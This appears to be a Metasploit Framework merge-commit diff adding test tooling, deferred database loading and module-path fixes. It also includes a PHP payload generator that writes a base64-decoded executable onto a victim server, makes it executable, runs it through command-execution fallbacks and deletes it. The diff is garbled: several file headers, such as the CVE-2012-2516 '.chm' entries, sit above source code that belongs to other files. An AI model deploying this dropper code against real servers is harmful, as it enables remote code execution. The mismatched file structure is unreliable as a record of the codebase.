Merge branch 'master' into feature/gemize-kissfft

Author: sinn3r

.rspec

@@ -0,0 +1,2 @@
+--color
+--format documentation

Gemfile

@@ -2,14 +2,26 @@ source 'http://rubygems.org'
 
 # Need 3+ for ActiveSupport::Concern
 gem 'activesupport', '>= 3.0.0'
+# Needed for Msf::DbManager
+gem 'activerecord'
+# Database models shared between framework and Pro.
+gem 'metasploit_data_models', :git => 'git://github.com/rapid7/metasploit_data_models.git'
 # Needed for module caching in Mdm::ModuleDetails
 gem 'pg', '>= 0.11'
 
 group :development do
-  # running documentation generation tasks
-  gem 'rake'
   # Markdown formatting for yard
   gem 'redcarpet'
   # generating documentation
   gem 'yard'
 end
+
+group :development, :test do
+  # running documentation generation tasks and rspec tasks
+  gem 'rake'
+end
+
+group :test do
+  # testing framework
+  gem 'rspec'
+end

Gemfile.lock

@@ -1,22 +1,62 @@
+GIT
+  remote: git://github.com/rapid7/metasploit_data_models.git
+  revision: dd6c3a31c5ad8b55f4913b5ba20307178ba9c7bf
+  specs:
+    metasploit_data_models (0.0.2)
+      activerecord
+      activesupport
+      pg
+      pry
+
 GEM
   remote: http://rubygems.org/
   specs:
+    activemodel (3.2.8)
+      activesupport (= 3.2.8)
+      builder (~> 3.0.0)
+    activerecord (3.2.8)
+      activemodel (= 3.2.8)
+      activesupport (= 3.2.8)
+      arel (~> 3.0.2)
+      tzinfo (~> 0.3.29)
     activesupport (3.2.8)
       i18n (~> 0.6)
       multi_json (~> 1.0)
+    arel (3.0.2)
+    builder (3.0.3)
+    coderay (1.0.8)
+    diff-lcs (1.1.3)
     i18n (0.6.1)
+    method_source (0.8)
     multi_json (1.3.6)
     pg (0.14.1)
+    pry (0.9.10)
+      coderay (~> 1.0.5)
+      method_source (~> 0.8)
+      slop (~> 3.3.1)
     rake (0.9.2.2)
     redcarpet (2.1.1)
+    rspec (2.11.0)
+      rspec-core (~> 2.11.0)
+      rspec-expectations (~> 2.11.0)
+      rspec-mocks (~> 2.11.0)
+    rspec-core (2.11.1)
+    rspec-expectations (2.11.3)
+      diff-lcs (~> 1.1.3)
+    rspec-mocks (2.11.3)
+    slop (3.3.3)
+    tzinfo (0.3.33)
     yard (0.8.2.1)
 
 PLATFORMS
   ruby
 
 DEPENDENCIES
+  activerecord
   activesupport (>= 3.0.0)
+  metasploit_data_models!
   pg (>= 0.11)
   rake
   redcarpet
+  rspec
   yard

Rakefile

@@ -1,7 +1,12 @@
 require 'bundler/setup'
 
+require 'rspec/core/rake_task'
 require 'yard'
 
+RSpec::Core::RakeTask.new(:spec)
+
+task :default => :spec
+
 namespace :yard do
   yard_files = [
       # Ruby source files first

data/exploits/CVE-2012-2516/template_mof.chm

@@ -1,20 +1,12 @@
 # -*- coding: binary -*-
-require "active_record"
 
+require 'msf/base/config'
 require 'msf/core'
 require 'msf/core/db'
 require 'msf/core/task_manager'
 require 'fileutils'
 require 'shellwords'
 
-# Provide access to ActiveRecord models shared w/ commercial versions
-require "metasploit_data_models"
-
-# Patches issues with ActiveRecord
-require "msf/core/patches/active_record"
-
-
-
 module Msf
 
 ###
@@ -28,24 +20,14 @@ class DBManager
 
 	# Mainly, it's Ruby 1.9.1 that cause a lot of problems now, along with Ruby 1.8.6.
 	# Ruby 1.8.7 actually seems okay, but why tempt fate? Let's say 1.9.3 and beyond.
-	def self.warn_about_rubies
+	def warn_about_rubies
 		if ::RUBY_VERSION =~ /^1\.9\.[012]($|[^\d])/
 			$stderr.puts "**************************************************************************************"
 			$stderr.puts "Metasploit requires at least Ruby 1.9.3. For an easy upgrade path, see https://rvm.io/"
 			$stderr.puts "**************************************************************************************"
 		end
 	end
 
-	# Only include Mdm if we're not using Metasploit commercial versions
-	# If Mdm::Host is defined, the dynamically created classes
-	# are already in the object space
-	begin
-    include MetasploitDataModels unless defined? Mdm::Host
-	rescue NameError => e
-	warn_about_rubies
-	raise e
-	end
-
 	# Provides :framework and other accessors
 	include Framework::Offspring
 
@@ -117,6 +99,14 @@ def initialize_database_support
 			# Database drivers can reset our KCODE, do not let them
 			$KCODE = 'NONE' if RUBY_VERSION =~ /^1\.8\./
 
+			require "active_record"
+
+			# Provide access to ActiveRecord models shared w/ commercial versions
+			require "metasploit_data_models"
+
+			# Patches issues with ActiveRecord
+			require "msf/core/patches/active_record"
+
 			@usable = true
 
 		rescue ::Exception => e
@@ -125,6 +115,18 @@ def initialize_database_support
 			return false
 		end
 
+		# Only include Mdm if we're not using Metasploit commercial versions
+		# If Mdm::Host is defined, the dynamically created classes
+		# are already in the object space
+		begin
+			unless defined? Mdm::Host
+				self.class.send :include, MetasploitDataModels
+			end
+		rescue NameError => e
+			warn_about_rubies
+			raise e
+		end
+
 		#
 		# Determine what drivers are available
 		#

data/exploits/CVE-2012-2516/template_payload.chm

@@ -0,0 +1,88 @@
+# -*- coding: binary -*-
+##
+# $Id$
+##
+
+###
+#
+# This module exposes a simple method to create an payload in an executable.
+#
+###
+
+load 'lib/msf/core/payload/php.rb'
+
+module Msf
+module Exploit::PhpEXE
+	include Exploit::EXE
+	include Payload::Php
+
+	#
+	# Generate a first-stage php payload.
+	#
+	# For ARCH_PHP targets, simply returns payload.encoded wrapped in <?php ?>
+	# markers.
+	#
+	# For target architectures other than ARCH_PHP, this will base64 encode an
+	# appropriate executable and drop it on the target system.  After running
+	# it, the generated code will attempt to unlink the dropped executable which
+	# will certainly fail on Windows.
+	#
+	# @option opts [String] :writable_path A path on the victim where we can
+	#   write an executable. Uses current directory if not given.
+	# @option opts [Boolean] :unlink_self Whether to call unlink(__FILE__); in
+	#   the payload. Good idea for arbitrary-file-upload vulns, bad idea for
+	#   write-to-a-config-file vulns
+	#
+	# @return [String] A PHP payload that will drop an executable for non-php
+	#   target architectures
+	#
+	# @todo Test on Windows
+	def get_write_exec_payload(opts={})
+		case target_arch.first
+		when ARCH_PHP
+			php = payload.encoded
+		else
+			bin_name = Rex::Text.rand_text_alpha(8)
+			if opts[:writable_path]
+				bin_name = [opts[:writable_path], bin_name].join("/")
+			else
+				bin_name = "./#{bin_name}"
+			end
+			if target["Platform"] == 'win'
+				bin_name << ".exe"
+				print_debug("Unable to clean up #{bin_name}, delete it manually")
+			end
+			p = Rex::Text.encode_base64(generate_payload_exe)
+			php = %Q{
+			error_reporting(0);
+			$ex = "#{bin_name}";
+			$f = fopen($ex, "wb");
+			fwrite($f, base64_decode("#{p}"));
+			fclose($f);
+			chmod($ex, 0777);
+			function my_cmd($cmd) {
+			#{php_preamble}
+			#{php_system_block};
+			}
+			if (FALSE === strpos(strtolower(PHP_OS), 'win' )) {
+				my_cmd($ex . "&");
+			} else {
+				my_cmd($ex);
+			}
+			unlink($ex);
+			}
+		end
+
+		if opts[:unlink_self]
+			php << "unlink(__FILE__);"
+		end
+
+		php.gsub!(/#.*$/, '')
+		php.gsub!(/[\t ]+/, ' ')
+		php.gsub!(/\n/, ' ')
+		return "<?php #{php} ?>"
+	end
+
+
+end
+end

lib/msf/core/db_manager.rb

@@ -2,6 +2,8 @@
 # Gems
 #
 require 'active_support/concern'
+require 'active_support/core_ext/hash'
+require 'active_support/core_ext/module'
 
 # Deals with module paths in the {Msf::ModuleManager}
 module Msf::ModuleManager::ModulePaths
@@ -15,24 +17,22 @@ def add_module_path(path)
     nested_paths = []
 
     # remove trailing file separator
-    path.sub!(/#{File::SEPARATOR}$/, '')
+    path_without_trailing_file_separator = path.sub(/#{File::SEPARATOR}$/, '')
 
-    pathname = Pathname.new(path)
+    # Make the path completely canonical
+    pathname = Pathname.new(path_without_trailing_file_separator).expand_path
     extension = pathname.extname
 
     if extension == Msf::Modules::Loader::Archive::ARCHIVE_EXTENSION
       unless pathname.exist?
-        raise RuntimeError, "The path supplied does not exist", caller
+        raise ArgumentError, "The path supplied does not exist", caller
       end
 
-      nested_paths << pathname.expand_path.to_s
+      nested_paths << pathname.to_s
     else
-      # Make the path completely canonical
-      pathname = Pathname.new(path).expand_path
-
       # Make sure the path is a valid directory
       unless pathname.directory?
-        raise RuntimeError, "The path supplied is not a valid directory.", caller
+        raise ArgumentError, "The path supplied is not a valid directory.", caller
       end
 
       nested_paths << pathname.to_s
@@ -41,7 +41,7 @@ def add_module_path(path)
       fastlib_glob = pathname.join('**', "*#{Msf::Modules::Loader::Archive::ARCHIVE_EXTENSION}")
 
       Dir.glob(fastlib_glob).each do |fastlib_path|
-        nested_pathnames << fastlib_path
+        nested_paths << fastlib_path
       end
     end
 

lib/msf/core/exploit/php_exe.rb

@@ -6,10 +6,17 @@
 ###
 module Msf::Payload::Php
 
-	def initialize(info = {})
-		super(info)
-	end
-
+	#
+	# Generate a chunk of PHP code that should be eval'd before
+	# #php_system_block.
+	#
+	# The generated code will initialize
+	#
+	# @options options [String] :disabled_varname PHP variable name in which to
+	#   store an array of disabled functions.
+	#
+	# @returns [String] A chunk of PHP code
+	#
 	def php_preamble(options = {})
 		dis = options[:disabled_varname] || '$' + Rex::Text.rand_text_alpha(rand(4) + 4)
 		dis = '$' + dis if (dis[0,1] != '$')
@@ -32,6 +39,20 @@ def php_preamble(options = {})
 		return preamble
 	end
 
+	#
+	# Generate a chunk of PHP code that tries to run a command.
+	#
+	# @options options [String] :cmd_varname PHP variable name containing the
+	#   command to run
+	# @options options [String] :disabled_varname PHP variable name containing
+	#   an array of disabled functions. See #php_preamble
+	# @options options [String] :output_varname PHP variable name in which to
+	#   store the output of the command. Will contain 0 if no exec functions
+	#   work.
+	#
+	# @returns [String] A chunk of PHP code that, with a little luck, will run a
+	#   command.
+	#
 	def php_system_block(options = {})
 		cmd = options[:cmd_varname] || '$cmd'
 		dis = options[:disabled_varname] || @dis || '$' + Rex::Text.rand_text_alpha(rand(4) + 4)
@@ -102,12 +123,12 @@ def php_system_block(options = {})
 		# Currently unused until we can figure out how to get output with COM
 		# objects (which are not subject to safe mode restrictions) instead of
 		# PHP functions.
-		win32_com = "
-			if (FALSE !== strpos(strtolower(PHP_OS), 'win' )) {
-				$wscript = new COM('Wscript.Shell');
-				$wscript->run(#{cmd} . ' > %TEMP%\\out.txt');
-				#{output} = file_get_contents('%TEMP%\\out.txt');
-			}else"
+		#win32_com = "
+		#	if (FALSE !== strpos(strtolower(PHP_OS), 'win' )) {
+		#		$wscript = new COM('Wscript.Shell');
+		#		$wscript->run(#{cmd} . ' > %TEMP%\\out.txt');
+		#		#{output} = file_get_contents('%TEMP%\\out.txt');
+		#	}else"
 		fail_block = "
 			{
 				#{output}=0;